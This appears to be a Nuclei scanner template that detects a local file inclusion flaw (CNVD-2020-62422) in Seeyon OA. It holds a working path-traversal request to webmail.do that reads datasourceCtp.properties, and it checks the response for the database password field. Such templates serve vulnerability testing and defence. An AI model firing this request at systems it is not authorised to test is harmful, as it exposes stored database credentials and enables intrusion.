漏洞描述
Seeyon is vulnerable to local file inclusion.
id: CNVD-2020-62422
info:
name: Seeyon - Local File Inclusion
author: pikpikcu
severity: medium
description: Seeyon is vulnerable to local file inclusion.
reference:
- https://blog.csdn.net/m0_46257936/article/details/113150699
metadata:
max-request: 1
tags: cnvd,cnvd2020,lfi,seeyon,vuln
http:
- method: GET
path:
- "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/x-msdownload"
condition: and
- type: word
part: body
words:
- "ctpDataSource.password"
condition: and
# digest: 4a0a00473045022024f68e882f5ce5458c9d5c6cfaf675620db16953487709167b57ed0c1f3dcef7022100a828adfda52a69277e5858d1128f0c136370dca55d7a0f696ce1c910944f2ee6:922c64590222798bb761d5b6d8e72950